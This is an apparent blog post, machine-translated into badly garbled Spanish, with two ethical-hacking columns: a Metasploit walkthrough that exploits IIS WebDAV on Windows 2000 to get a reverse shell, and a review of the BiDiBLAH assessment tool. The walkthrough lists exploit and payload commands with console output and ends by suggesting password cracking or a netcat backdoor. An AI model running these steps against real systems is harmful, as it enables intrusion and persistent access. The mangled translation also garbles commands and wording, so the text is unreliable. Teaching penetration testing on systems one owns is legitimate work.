¿Cómo es que a duras realmente en peligro un sistema? Como instructor de hacking ético, que es una cuestión que me pregunta muy a menudo. Mi respuesta habitual a este tipo de pregunta es fomentar el autor de la pregunta para tratar de comprometer un sistema, de su propiedad, para conocer el tiempo y la calificación necesaria para comprometer un sistema. Hay un valor real en obtener un verdadero sentido de lo que realmente se lleva a la derrota común de hecho las medidas de seguridad. Esto proporciona experiencia de primera mano que no puede ser duplicada de escuchar a expertos de la industria o de la lectura de artículos y libros. La razón principal de esto es que hay mucha desinformación, algunos intencionales y otros no, disponible. La forma más fácil de determinar cuán difícil algo así como comprometer o derrotar a los sistemas de encriptación inalámbrica es - es intentarlo por sí mismo.
La mayoría de los profesionales de la seguridad saben penetrar y atacar a los dispositivos de red es cada vez más fácil y sofisticación ataque es cada vez más complejo. En gran parte este fenómeno se debe al viejo dicho de "de pie sobre los hombros de gigantes." Muchos investigadores han descubierto sistema de la seguridad debilidad es común el diseño del sistema hace años, y como profesionales de la seguridad que comparten la información. Esto permite que alguien con poca comprensión de la arquitectura del sistema para poder realizar ataques más complejos que nunca a pesar de lo posible.
Para un profesional de la seguridad es posible comprometer un sistema sin gastar meses aprendiendo un lenguaje de programación y de los años de aprendizaje arquitectura del sistema. Podemos realmente utilizar la tecnología para ayudar en la ejecución de la penetración del sistema de penetración. Productos básicos como la Core Impact Seguridad e Inmunidad del Lienzo productos (Ver post: Hacking con Exploit Marcos) han venido prestando este tipo de funcionalidad para unos pocos años. Estos fabricantes no sólo proporcionar la tecnología, sino que también proporcionará capacitación y apoyo de sus productos para permitir a un profesional cualificado para llevar a cabo una prueba de la penetración más metodológico. Esto hace que la tarea de comprometer un sistema más fácil para un administrador de seguridad.
Las empresas de servicios públicos antes mencionados son a la vez los productos a base de tasas, pero más recientemente, de código abierto y se ha convertido en un producto común de la vista en la penetración de material para análisis. Esta utilidad se llama Metasploit ™. Tanto los usuarios de Windows y Linux pueden sacar partido de la Metasploit ™ producto para realizar un test de intrusión o sistema de compromiso. La utilidad sí mismo está escrito en muchos lenguajes de programación incluyendo Perl, C, y ensamblador.
Este entorno ofrece muchas listas para usar exploits y permite también la seguridad de pruebas para personalizar o crear su propio explotar. El proceso básico para el uso de la consola de Metasploit ™ no es el más intuitivo, pero creo que esto se ha hecho para disuadir a los menos calificados script kiddies de intentar entrar en el sistema utilizando esta utilidad específica. El formato básico para la explotación del sistema es el siguiente:
1. Pick que explotan a utilizar
2. Configurar el explotar con mando a distancia dirección IP y número de puerto remoto
3. Elija una carga útil
4. Configurar la carga útil local con dirección IP y número de puerto local
5. Ejecutar la explotación
Si bien este proceso es mucho más difícil de hacer que sólo un "punto y haga clic en" utilidad, no debe tomar más de una hora para conseguir una buena sensación para el proceso general. Tal vez el mecanismo más fácil para usar el Metasploit ™ es de utilidad para tomar ventaja de un arranque "Live CD", como Whoppix o Auditor.
Muchos expertos creen que la comprensión de cómo poner en peligro un sistema de conocimientos que no debe ser compartido y servicios públicos tales como Metasploit ™, Canvas, y Core Impact facilitar a los sistemas a ser comprometida o explotar el código a desarrollar. Hasta cierto punto no se puede afirmar que estas empresas de servicios públicos que el proceso sea más fácil, pero no se ha producido un importante aumento de la cantidad de explotar el código disponible desde la liberación de estas herramientas. Asimismo, recuerda que el agujero de seguridad no está en el hecho de que explotar existe código que permite a un atacante introducirse en un sistema - el agujero está en el hecho de que la vulnerabilidad subyacente existe, en primer lugar.
También es digno de notar que la mayoría de los atacantes sistema ya tengan el conocimiento necesario de la forma de compromiso o de los sistemas de explotación de la forma de elaborar el código. Estas utilidades dar el administrador de seguridad la oportunidad de poner a prueba sus propios sistemas de los fallos de seguridad antes de que un atacante descubre esto y de una manera esto comienza a nivelar el campo de juego para la seguridad personal de la administración. De hecho estos tipos de empresas de servicios públicos pueden convertirse en una práctica común para el sistema de los desarrolladores a utilizar al escribir la aplicación y esto puede impedir que la vulnerabilidad de cada vez que se publican en primer lugar.
Le animo a encontrar algo de tiempo para sentarse y descargar un "Live CD" de distribución, hasta que el fuego, y salir antes de una de las empresas de servicios públicos antes mencionados. Así que si alguien nunca se menciona la dificultad para comprometer un sistema que se sepa exactamente lo que tiene realmente.
Ejemplo de la utilización de Metasploit ™
El objetivo del ejercicio que figura a continuación es que se familiarice con el marco Metasploit ™ y para llevar a cabo una transacción de un sistema de Windows 2000. Estos pasos se puede hacer fácilmente de las más populares distribuciones de Linux CD de arranque. Los pasos que aparecen a continuación son para el uso con el Whoppix / distro Whax (http://ftp.belnet.be/linux/whoppix/). Entiendo que algunas personas prefieren el interfaz web para el uso de Metasploit ™, pero a partir de nuestra amplia pruebas hemos encontrado la buena línea de comandos de edad a ser más fiable.
Para comenzar, arranque con el CD y coge una ventana de shell. A partir de ahí tendrá que pasar a la Metasploit ™ directorio. Para ello desde la línea de comandos de tipo:
CD / KNOPPIX/pentest/exploits/framework-2.3 /
Inicie la consola de Metasploit ™. Para ello, desde una línea de comandos escriba lo siguiente:
# ". / Msfconsole"
Pick que explotan a utilizar
Una vez que el msfconsole está en ejecución, es el momento de decidir qué explotar al atentado contra el sistema de destino. Sus opciones aquí talón de los siguientes comandos:
info
El uso de comandos dirá exactamente la utilidad que explotar para seleccionar. El espectáculo comando no hará nada por su cuenta, pero se puede combinar con exploits o cargas útiles, como se muestra en los siguientes ejemplos. El comando info proporciona detalles acerca de un módulo específico.
Empieza introduciendo "mostrar exploits" para ver la lista de exploits disponibles. Bastante impresionante, ¿no? Muchos de los exploits que aparecen aquí son de ir a trabajar en contra de los servidores de la meta y, de hecho, que utilizamos muchas de estas explotaciones en el curso de hacking ético.
Si usted necesita algunas pistas, recomiendo a partir de la "iis50_webdav_ntdll" explotar.
Para comenzar la explotación de tipo "uso iis50_webdav_ntdll"
Después de utilizar - de las opciones de configuración
Hemos seleccionado nuestra explotar, pero no lo ha hecho aún. Tenemos que establecer opciones. Estas opciones incluyen la IP de destino y el puerto de destino. Las opciones se configuran mediante el comando set. El espectáculo avanzadas de comando para saber si hay más opciones que se pueden establecer. La mayoría de los exploits no tienen opciones avanzadas.
Empiece a escribir "mostrar opciones"
Esto le mostrará el comando a ejecutar los requisitos de explotar.
Estos incluyen la RHOST (Esta es la acogida que vamos a un compromiso) y la RPORT (este es el puerto que la función vulnerable está corriendo)
Para configurar estas opciones tipo "set RHOST
Apoyado explotar metas
=========================
0 2000 Bruteforce
¿Qué queremos un exitoso ataque a hacer?
¿Qué Metasploit ™ pide una carga útil, muchos otros se refieren a como código shell o opcode. Este es el código que queremos tener insertarse directamente en el buffer que nos desborda. En la mayoría de los casos el depósito de código va a ser el paquete de servicio cargo, OS cargo, y arquitectura (i386) a cargo también. Esto significa que la mayoría de las cargas útiles en el marco Metasploit ™ trabajará sólo para determinados OS y en determinados procesadores. Incluso si selecciona una carga útil tendrá que configurar las opciones para obtener la carga útil de trabajo. El tipo de uso más frecuente de la concha código es el código que genera una inversión de la shell sistema comprometido de nuevo a atacar el sistema. Uso de la talones mencionado antes en la sección explota también se aplican a las cargas útiles de la sección. Si usted escribe "mostrar cargas útiles" debería ver una respuesta como la siguiente.
MSF iis50_webdav_ntdll> muestran las cargas útiles
Metasploit ™ Marco utilizable cargas útiles
====================================
Win32_bind Bind Shell de Windows
Win32_bind_dllinject Windows obligará a inyectar DLL
Win32_bind_meterpreter Windows obligará a inyectar Meterpreter DLL
Win32_bind_stg etapas Bind Shell de Windows
Win32_bind_stg_upexec Windows obligar a cabo Subir / Ejecutar
Win32_bind_vncinject Windows VNC Server DLL obligará a inyectar
Win32_exec Windows ejecutar comando
Win32_reverse invertir Windows Shell
Win32_reverse_dllinject invertir DLL de Windows Inyectar
Win32_reverse_meterpreter invertir Meterpreter DLL de Windows Inyectar
Win32_reverse_stg invertir en escena Windows Shell
Win32_reverse_stg_upexec Windows etapas invertir Subir / Ejecutar
Win32_reverse_vncinject invertir Windows VNC Server inyectar
En este caso, el mejor shell para tratar será la win32_reverse carga útil. Para hacer este tipo de "conjunto PESO TRANSPORTABLE win32_reverse"
Esto requiere algunas opciones de carga útil. Estos incluyen la salida de la función, el equipo local y el puerto local.
Para ver estas opciones tipo "mostrar opciones", debería ver algo como lo siguiente:
Msf iis50_webdav_ntdll (win32_reverse)> mostrar opciones
Exploit y opciones de carga útil
===========================
Exploit: nombre descripción predeterminada
-------- ------ ----------- ------------------
Usar SSL SSL opcional
Requiere RHOST 67.36.70.19 El objetivo de la dirección
Requiere RPORT 80 El puerto destino
Carga útil: nombre descripción predeterminada
--------------------------- ------- -------- -------- ---------------
Requiere EXITFUNC seh técnica de la salida: "proceso", "el hilo", "seh"
LHOST Local necesario para recibir la conexión
Requiere LPORT Local puerto 4321 para recibir la conexión
Meta: Windows 2000 Bruteforce
Para configurar las opciones de los desaparecidos, vamos a usar el comando set como anteriormente. Antes de poder establecer estos valores tenemos que saber lo que es. Para encontrar su dirección IP local de abrir otra ventana de shell, ya sea por el botón de la derecha o en el escritorio (si el CD tiene esta opción) busque el icono de la computadora en el programa de barras. Si hace click derecho sobre el escritorio de buscar la opción de shell. Si lo hace este paso derecha debería ver un nuevo cuadro de shell (kinda sorta como un cuadro de comandos de DOS en XP) aparecerá.
Una vez que usted haya abierto la caja de tipo "ifconfig". Esto mostrará la información de todas las interfaces para usted sistema linux. Este es el equivalente del comando ipconfig en Windows. Debería ver algo como lo siguiente:
[Root @ localhost ~] # ifconfig
Eth0 Link encap: Ethernet HWaddr 00:03:25:13:43: F2
Inet addr: 10.5.14.173 Bcast: 10.5.15.255 Mask: 255.255.252.0
Inet6 addr: fe80:: 203:25 ff: fe13: 43f2/64 Alcance: Link
UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrico: 1
RX packets: 4563 errores: 0 caído: 0 sobrecostos: 0 frame: 0
TX packets: 2905 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
Colisiones: 0 1000
RX bytes: 3696580 (3,5 MiB) TX bytes: 325618 (317,9 KiB)
Interrupción: 193 Base dirección: 0x4c00
Lo Link encap: Local Loopback
Inet addr: 127.0.0.1 Mask: 255.0.0.0
Inet6 addr::: 1 / 128 Scope: Host
UP LOOPBACK RUNNING MTU: 16436 Métrico: 1
RX packets: 213 errores: 0 caído: 0 sobrecostos: 0 frame: 0
TX packets: 213 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
Colisiones: 0 txqueuelen: 0
RX bytes: 49707 (48,5 KiB) TX bytes: 49707 (48,5 KiB)
Lo que nos interesa, es el valor de la eth0 (o lo que es activo en su sistema podría ser eth1 o algún otro interfaz), pero debería ver el valor inet addr: y su dirección IP que aparece junto a este. En el ejemplo anterior es la dirección IP 10.5.14.173. Si se mira de cerca verá que es allí. VAYA por delante y esperamos - nadie se reirán prometo.
Una vez que sabemos que este valor vamos a configurarlo con el comando set. Para hacer este tipo "set LHOST
Exploit y opciones de carga útil
===========================
Exploit (Msf:: Exploit:: iis50_webdav_ntdll):
-------------------------------------------
De carga útil (Msf:: Carga útil:: win32_reverse):
--------------------------------------
Hacer que todo suceda
Ahora es el momento de ver los frutos de su trabajo. Esta siguiente fase realmente en peligro el sistema si se ha hecho todo correctamente, y el sistema es vulnerable. Si todo va bien será titular de la caja.
Para hacer este tipo de "explotar"
Una vez que la explotación de lanzamiento puede llevar su tiempo. El está tratando de explotar la fuerza bruta la memoria para compensar la función vulnerable. Si no sabe lo que esto significa y quiere aprender - ver la clase de hacking ético que se mencionaron antes.
Si has hecho todo lo que la derecha debería ver algo como lo siguiente.
A partir Reverse Handler.
Conexión a servidor web. OK
Embarazo dirección de retorno 0x004e004f ...
El envío de solicitud (65739)
Conexión a servidor web. OK
Embarazo dirección de retorno 0x00420041 ...
El envío de solicitud (65739)
Conexión a servidor web. OK
Embarazo dirección de retorno 0x00430041 ...
El envío de solicitud (65739)
Conexión a servidor web. OK
Embarazo dirección de retorno 0x00c10041 ...
El envío de solicitud (65739)
Conexión a servidor web. OK
Embarazo dirección de retorno 0x00c30041 ...
El envío de solicitud (65739)
Conexión a servidor web. OK
Embarazo dirección de retorno 0x00c90041 ...
El envío de solicitud (65739)
Si lo logra tendrá una conexión remota a la computadora de destino y puede hacer lo que quieras. Una vez que hayas hecho esto y recibieron la pronta para el resto de sistemas que "la propia caja". No voy a decirles cuál es el próximo paso, después de todo ¿dónde está la diversión en eso. No la basura el sistema está mal si quieres explotar de nuevo. Es posible que desee para tratar de romper las contraseñas-o puede crear su propio netcat puerta trasera.
Metasploit ™ - disponible desde http://www.Metasploit ™. Com
No es esencial que el usuario arrancar un CD de linux. Para probar el marco de un sistema Windows, El Metasploit Project ofrece un instalador de Windows en su propia página web.
Por Justin Peltier, CTO, Peltier Associates
Si no le dieron la oportunidad de ir a la Negro Hat / Defcon conferencia de este año que probablemente no han oído hablar de BiDiBLAH aún. BiDiBLAH es un nuevo pseudo utilidad de la gente de SensePost (http://www.sensepost.com). Desde hace algún tiempo el talento de los desarrolladores SensePost han participado en el Google Hacking comunidad y han puesto en libertad a varios de los scripts de / utilidades que muy práctico para trolling de información por parte de Google.
BiDiBLAH es el último lanzamiento de la SensePost grupo y que se necesita un gran paso adelante a partir de la secuencia de comandos de las búsquedas Google. BiDiBLAH La utilidad es un marco que puede ser usado para ayudar a automatizar la evaluación de la vulnerabilidad / hacking ético proceso. BiDiBLAH es una utilidad basada en Windows ® que permite iniciar el proceso de prueba a ser punto y clic. El BiDiBLAH utilidad no tratar de recrear ya bien conocidas, utilizar, y apoya las aplicaciones de fuente abierta vulnerabilidad, sino más bien utiliza los ya existentes BiDiBLAH hacking ético / herramientas de evaluación de la vulnerabilidad - estos incluyen tanto Nessus (http://www.nessus.org) y MetaSploit (Http://www.metasploit.com). Así como el actual de Google Hacking guiones de SensePost.
A partir de este escrito, la versión completa de BiDiBLAH no está actualmente en venta, pero la versión que está disponible es totalmente funcional, con dos excepciones:
1. El tiempo de búsqueda se limita a una hora
2. La función de guardar los datos que se ha inhabilitado
La instalación
Como llegar BiDiBLAH corriendo no es una tarea trivial. La principal instalación de la utilidad es muy sencillo y se ejecuta en el formato install.exe. Una vez que la instalación de la utilidad se BiDiBLAH completo tendrá que hacer algunos cambios a su sistema operativo para permitir que la utilidad de la función. El primer paso es cargar un bruto paquete controlador que permita que el BiDiBLAH utilidad para enviar los paquetes necesarios para el escaneo de puerto y el acaparamiento de banner. Cuando haya completado este paso, le tarjeta de red de configuración debería haber añadido el protocolo como el ejemplo a continuación.
Figura 1 - BiDiBLAH paquete de instalación del controlador en bruto
El siguiente paso es deshabilitar el firewall de Windows ® y de cualquier otro software de firewall personal que usted pueda tener ejecutando en el sistema de destino. Sólo desactivar el cortafuegos personal no es suficiente, ya que la utilidad BiDiBLAH necesidad de bloquear los RST (reset) paquetes. La recomendación de la SensePost grupo es instalar el firewall personal libre ventanas - wipfw disponibles de http://sourceforge.net/projects/wipfw. Yo estaba realmente sorprendido por la funcionalidad de wipfw. Permite la filtración granular más comercial que la mayoría de los cortafuegos personales, pero el debate de esta utilidad será en otro artículo. Todo lo que se necesita para fines de BiDiBLAH es crear una regla como se mencionó antes para bloquear la RST paquetes. Esto se puede hacer desde la línea de comandos al emitir el siguiente comando:
Ipfw añadir negar TCP 00100 desde cualquier a cualquier tcpflags primero
O wipfw a través de la nueva interfaz gráfica de usuario, como la siguiente figura:
Una vez que haya agregado la nueva norma puede comprobar la configuración ejecutando:
Ipfw lista
Desde la línea de comandos. Esto completa la instalación de BiDiBLAH. El siguiente paso es configurar BiDiBLAH para ejecutar los controles de seguridad que usted desea.
La configuración
Para configurar BiDiBLAH doble clic sobre el icono y usted debería ver un pop-up mensaje de este tipo:
A partir de este escrito, la versión de pago no ha sido puesto en libertad. Simplemente haga clic en OK para ir a la interfaz. La interfaz tiene muchas pestañas de la parte superior que se utilizan para la configuración. Para configurar copias de BiDiBLAH cambiar las opciones en las siguientes fichas:
1. En la pestaña Subdominio:
Introduzca su clave de la API de Google (Usted puede obtener una clave en api.google.com)
La profundidad de Google (en múltiplos de 10) establece el número de consultas deben ser devueltos
El Google las palabras clave son palabras que BidiBLAH utilizar para combinar con las preguntas
2. En la pestaña Remite:
Seleccione su BFDNS donde los archivos son. La aplicación buscará cualquier archivo que termina con. Bfdns extensión y añadir su contenido a la lista de nombres que se utilizarán para la fuerza bruta.
La prueba de fondo se ajusta la profunda dentro de cada archivo de la solicitud de prueba antes de asumir un esquema de nombres
Si quieres poner a prueba todas las entradas puede comprobar anular la casilla de verificación
3. En Portscan ficha:
Introduzca la fuente de propiedad intelectual donde se QAlive de enviar paquetes. Si ésta no es su dirección IP, los paquetes se falsa de la dirección que has seleccionado. Esto podría ser de gran utilidad si se está ejecutando un tcpdump a algún otro sitio…
Ingrese su dirección mac fuente - se puede obtener haciendo un ipconfig / all en una ventana de DOS
Introduzca la dirección de destino de mac. Debido a que no han aplicado ARP que necesita para configurar esta opción manualmente. La mayoría de las veces no es una gran cosa sin embargo - probablemente será escaneado máquinas en el otro lado de su puerta de enlace por defecto. Esto hace que el destino de mac que la dirección de su puerta de enlace por defecto. Se puede llegar fácilmente por esta viendo su tabla ARP. ¿Un "arp-a" en una ventana de DOS. Si el proceso de escaneo de local… lo siento (o puede conectar un router entre usted y su red local.
El puerto de carga del archivo de lista - se trata de un archivo de texto que contiene los rangos de puertos que desea ver como una lista desplegable (en QAlive).
4. En Nessus ficha:
Seleccione el servidor de Nessus (IP o nombre DNS), Nessus nombre de usuario y contraseña
Seleccione en la que la solicitud debe encontrar los archivos PLG (Nessus plugin de selección de archivo). Esto se publicará en el conjunto plugin lista desplegable en la sección de Nessus.
5. En MetaSploit ficha:
Introduzca la ubicación de Metasploit marco de la interfaz web
Introduzca la ubicación de su local MSF casa - este se utiliza cuando la configuración de su explota
Si sus hazañas ya están configurados puede guardar en el archivo de configuración de las cadenas y cárguelo
Usted también debe cargar el MetaSploit 2 Nessus archivo de texto. Coincide con plugins de Nessus al MetaSploit explota
El intérprete PERL utilizado para Metasploit necesidades que se establezcan
Puede probar su Metasploit configuración haciendo clic en "carga explota" en la pestaña MetaSploit - debería ver una lista de hazañas. Haciendo doble clic sobre el explotar trae hasta la pantalla de configuración de explotar.
6. Cuando haya terminado de configurar:
Haga clic en el botón Save en la "configuración de carga / Guardar" - la próxima vez que inicie BiDiBLAH ahora puede simplemente hacer clic en el botón azul LOAD y usted no tiene que ir a través de toda la misión de nuevo.
7. Cargar y guardar configuraciones:
Elige un "Cargar Config" ficha de cargar un archivo de configuración de ejemplo en c: \ bidiblah \ config (si se eligió por defecto). La ubicación de los archivos BFDNS, un conjunto de los puertos por defecto en el archivo portlist así como la IP2C PP debería ser configurado correctamente. Si ha instalado la aplicación en otra ubicación que necesita para configurar estos manualmente.
En cualquier etapa puede guardar la configuración (y cargar de nuevo más tarde).
Nota: Gran parte de lo anterior fue tomado de la guía de inicio rápido
Atletismo BiDiBLAH
Ahora que la configuración se realiza es el momento de utilizar la utilidad. El primer paso que no podía encontrar en cualquier lugar y documentado también es un poco intuitiva no es crear un archivo que contiene su objetivo de nombres de dominio. En este caso, yo simplemente cuaderno abierto y ha creado un archivo de la figura del dominio que yo estaba interesado en la búsqueda sobre: pelttech.com. He cargado este archivo en el subdominio haciendo clic en la pestaña de la importación (de archivo) y el botón de navegación sobre al nuevo archivo.
La búsqueda en mi dominio está lejos de ser interesante como se puede ver a continuación:
Para entonces, de nuevo el dominio que quiero es el mío, y es bastante pequeña. Así que he cambiado de búsqueda y añadió Microsoft.com - Voy a compartir estos resultados después. El seguimiento sobre el uso de pelttech.com para la búsqueda me mudé a la pestaña adelante. El primer paso que era necesario en este caso fue la de importar datos de la ficha de subdominios. Esto se hizo haciendo clic en la Importación (app) botón. Se colocan automáticamente los datos de la Sub-dominios de búsqueda en la aplicación Adelante.
Los resultados y la función de la Adelante parte de la utilidad fue bastante decepcionante. Al parecer, al igual que la utilidad está tratando de reunir más información acerca de la meta a través de la información DNS de la minería, pero éste es sólo el hecho a un nivel muy alto y no casi a la profundidad que quiero realizar en un manual de prueba. La captura de paquetes de etéreo a continuación se muestra la comprobación realizada por BiDiBLAH. Por referencia de la máquina se me ha utilizando el servidor DNS primario para establecer la dirección IP 4.2.2.1.
La búsqueda habría sido más eficaz si la consulta de primaria pidió a la SOA (Start Of Authority) primero y registrar todos los NS (Nameservers) segundo. Luego siguieron las respuestas de estas dos preguntas de la configuración del servidor en primer lugar a la SOA resultado y luego a la secundaria NS resultados. En el caso anterior el MX (Mail Exchanger) y el NS se preguntó por las consultas posteriores parecen seguir aún con el uso 4.2.2.1 para el servidor DNS.
Una vez que la búsqueda se realiza hacia la siguiente serie de pruebas Netblocks aparecen en la ficha. Esta ficha fue una vez más un poco de no-intuitivo y de la documentación que falta. Para importar la información de la Remite clic en la sección de importación (app) tal y como botón de la sección Remite. En el caso de mi dominio que advirtió de que la utilidad está asumiendo una clase "C" de bloques de direcciones IP, ya que no pudo encontrar más información. Una vez que haya cargado en su cuadra, es necesario hacer doble clic en el netblock propio en el panel de la derecha. Esto carga los datos en el Transmite en el bloque de la sección. A partir de aquí hay un botón para realizar una búsqueda whois en el bloque IP. Esto me dejó con una pantalla que se veia como las siguientes:
Desde aquí me ha dejado perplejos por lo que se hará. Yo estaba ahora alrededor de una hora en la BiDiBLAH experiencia y tuve que reiniciar la versión demo del software. El siguiente conjunto de herramientas se llama inversa. Una vez más, los datos se importan de la sección anterior mediante el uso de la importación (app) botón. Desde aquí un botón de inicio era todo lo que era necesario para el comienzo de la próxima oleada de control. Este conjunto de pruebas fue útil, pero podría mejorarse con un poco de modificación. La captura de paquetes de etéreo a continuación muestra los tipos de preguntas que la utilidad fue de envío:
Como se puede ver por encima de la utilidad fue la realización de RDNS solicitudes. Yo estaba feliz de ver esto, porque es un tiempo lento y el proceso de hacerlo a mano, pero al igual que el anterior DNS - Adelante sección utiliza la utilidad de configuración de mi cliente servidor DNS primario y no la SOA o asociados con otros nombres La meta de dominio. Anuncio en el paquete de captura de las preguntas que se dirigen a la dirección IP 4.2.2.1.
Esto conducirá a DNS de la información no fue devuelta a la BiDiBLAH utilidad. El resultado parecía terminado de la siguiente figura:
En la siguiente pestaña - Port Scanner - debe asegurarse de que en su configuración, deberá poner en su dirección IP, su dirección MAC, y un destino dirección MAC. A continuación, haga clic en el botón Bind adaptador y seleccione su adaptador de la lista desplegable. Si omite alguno de estos pasos, verá el siguiente mensaje:
Una vez que tenga el adaptador de cuestiones elaboradas usted puede utilizar la siguiente lista desplegable para configurar el adaptador de los puertos que desea escanear. Como puede ver en la captura de paquetes por debajo de la utilidad envía un paquete SYN a los puertos seleccionados en orden secuencial.
Asignaron al azar a los puertos seleccionados y permitir a otros tipos de escaneo de puertos sería útil aquí o de la capacidad de utilizar nmap para el escaneo como Nessus hace. También el escáner perdido unos pocos puertos abiertos (no estoy seguro de por qué y no tenía el tiempo para investigar). Aquí está el resultado final de la exploración de puertos.
En la sección de banners tuve que crear otro archivo de texto con las direcciones IP de los servidores de mi para ver si podía continuar con la utilidad. Mediante el uso de notas de nuevo sólo me inserta algunas IPs de los sistemas vivos para ver si BiDiBLAH podría apoderarse de los banners. Una vez más, no tengo ni idea de por qué este es el caso, pero las preguntas aguarda extraño mientras mira a través de etéreo. Esto es lo que vi:
He encontrado estas preguntas impares porque aquí está la lista de las direcciones IP que me alimenta a la utilidad como insumo:
No he visto que aparece en los paquetes de captura (ver imagen superior).
En la siguiente sección (de orientación) de la parte superior dirección IP - 72.41.28.76 hizo aparecer como un blanco potencial. He seleccionado esta meta y luego se trasladó a la sección siguiente Nessus. El Nessus escanear a través de la importación (app) botón de carga en la dirección IP como un objetivo correcto Nessus. Desde el menú desplegable plugins hay algunos plugins establece que se pueden elegir. La información acerca de los conjuntos de plugins que parece haber una falta (mi es la mejor estimación. Nessusrc archivo puede ser copiado) sino que es sólo una conjetura. En algunos documentos que he encontrado hay opciones en esta pantalla para configurar los plugins de nessus conjunto. Sin embargo en mi versión estas opciones están desaparecidos. Este conjunto de pruebas realmente funcionaba muy bien. Tuve el nessus instalado en un servidor RedHat 9 VMWare imagen actual corriendo en mi máquina. La utilidad BiDiBLAH pudo ingresar en el servidor nessus y ejecutar las pruebas sin ningún tipo de dificultad. Yo estaba impresionado con lo bien que se trata de hacer. Así como antes de que el escaneo de puertos no ha obtenido resultado y por lo que mi escaneo terminó aquí, ya que el siguiente conjunto de los servicios públicos se Metasploit y yo no podía correr nessus Metasploit sin encontrar un puerto abierto. En este punto he creado una nueva meta en mi sistema local y comenzaron los ensayos de la sección de exploración de puerto.
La última sección de la sección Metasploit fueron prometedores. El meta2nessus característica parece ser útil ya que cargado el nessus y de los correspondientes controles Metasploit ataque de la vulnerabilidad. Como ya se estaba acabando de tiempo no he tenido la oportunidad de continuar los ensayos las dos últimas fases.
Resumen
BiDiBLAH, tal como es, no es del todo listo para el uso comercial de las empresas con la evaluación de la vulnerabilidad. Sin embargo, la funcionalidad es bastante impresionante para esta etapa inicial. La documentación tiene que ser un poco mejor y, en gran parte, que es lo que creo que algunos de esta columna lo que realmente es. Una vez que estas cuestiones se allanarse BiDiBLAH puede ser un gran ahorro de tiempo para el probador de seguridad regulares. Como se señala en la versión que yo estaba usando para poner a prueba, el interrogatorio DNS necesita un poco de un pellizcar, pero esto se puede solucionar cambiando la configuración IP del cliente para usar el SOA de la meta como el DNS primario, y también la Comprobar puertos pueden perder puertos abiertos. En la columna del próximo mes vamos a volver BiDiBLAH y ver lo que hemos podido averiguar con más tiempo para los ensayos.
Referencias:
BiDiBLAH Guía de Inicio Rápido - disponible desde http://www.sensepost.com/research/bidiblah
Disertación en SensePost Negro Hat - disponible desde http://blackhat.com/presentations/bh-usa-05/bh-us-05-sensepost.pdf
Wipfw - disponible desde http://wipfw.sourceforge.net/
Nessus - disponible en http://www.nessus.org
Metasploit - disponible desde http://www.metasploit.com
Няма коментари:
Публикуване на коментар